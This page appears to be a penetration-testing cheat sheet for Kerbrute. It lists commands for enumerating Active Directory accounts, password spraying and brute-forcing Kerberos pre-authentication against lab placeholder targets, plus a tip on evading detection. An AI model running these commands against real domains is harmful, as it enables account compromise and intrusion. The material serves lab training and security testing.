🦁Kerbrute

Introduction

A tool to perform fast brute force attacks and enumerate valid Active Directory accounts through Kerberos pre-authentication.

Installation and Usage Guide

Clone the GitHub repository:

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing

Detailed guide available through the following blog:

A Detailed Guide on Kerbrute - Hacking Articles

VERY IMPORTANT: Synchronize your system time with the Domain Controller

sudo ntpdate -s 10.10.10.10

User Enumeration

# Brute force to enumerate users
kerbrute userenum --dc 10.10.10.10 -d domain.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Password Spraying and Brute Force

Password Spraying

# Password spraying - test one password against a list of users
kerbrute passwordspray -d domain.htb --dc dc.domain.htb users.txt 'password'

Brute Force Attacks

# Brute Force with a list of users and passwords
# Format: username:password
kerbrute bruteforce -d domain.htb --dc dc.domain.htb userspasswords.txt

# Brute Force against a single user with a password list
kerbrute bruteuser -d domain.htb --dc dc.domain.htb passwords.txt 'target_user'

Key Parameters

--dc: Specify the Domain Controller IP address
-d: Target domain name
userenum: Enumerate valid usernames
passwordspray: Test one password against multiple users
bruteforce: Test multiple username:password combinations
bruteuser: Test multiple passwords against one user

Tips and Best Practices

Always synchronize time with the Domain Controller before starting
Use comprehensive username lists for enumeration
Be mindful of account lockout policies when performing brute force attacks
Consider using delay options to avoid detection
Monitor for failed authentication logs on the target system

PreviousImpacket NextLDAPSearch

Last updated 2 months ago